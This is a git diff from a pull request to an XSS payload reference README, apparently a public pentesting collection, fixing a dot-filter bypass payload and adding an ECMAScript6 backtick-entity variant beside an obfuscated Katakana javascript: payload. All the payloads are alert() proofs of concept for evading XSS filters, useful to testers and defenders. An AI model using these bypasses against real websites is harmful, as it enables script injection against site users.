Merge pull request #46 from 0xInfection/patch-2

Added a new bypass variant + fixed a payload

XSS injection/README.md

@@ -465,7 +465,7 @@ You can bypass a single quote with ' in an on mousedown event handler
 Bypass dot filter
 
 ```javascript
-<script>window['alert'](document['domain'])<script>
+<script>window['alert'](document['domain'])</script>
 ```
 
 Bypass parenthesis for string - Firefox/Opera
@@ -654,6 +654,12 @@ Bypass using [Katakana](https://github.com/aemkei/katakana.js)
 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
 ```
 
+Bypass using ECMAScript6 variation:
+
+```
+<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
+```
+
 Bypass using Octal encoding
 
 ```javascript